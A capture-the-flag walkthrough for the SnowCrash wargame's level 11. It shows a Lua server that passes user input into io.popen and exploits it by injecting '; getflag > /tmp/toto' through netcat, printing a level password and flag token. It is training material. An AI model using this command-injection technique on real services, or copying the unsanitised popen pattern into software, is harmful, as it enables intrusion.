flag10@SnowCrash:~$ su level11
Password: feulo4b72j7edeahuete3no7c

level11@SnowCrash:~$ ls -l
-rwsr-sr-x 1 flag11 level11 668 Mar  5  2016 level11.lua

level11@SnowCrash:~$ cat level11.lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end
********************************************************************************
All the function is obviously useless, but the hash function use io.popen, that
concatenates and executes a shell command. So we can exploit this by injecting
another command after the echo.  But we have to first connect to the server
127.0.0.1 on the port 5151 with netcat.
********************************************************************************

level11@SnowCrash:~$ nc 127.0.0.1 5151
Password:
Erf nope..

********************************************************************************
We have an answer so we will echo our exploit on the server.
********************************************************************************

level11@SnowCrash:~$ echo "; getflag > /tmp/toto" | nc 127.0.0.1 5151
Password: Erf nope..
level11@SnowCrash:~$ cat /tmp/toto
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
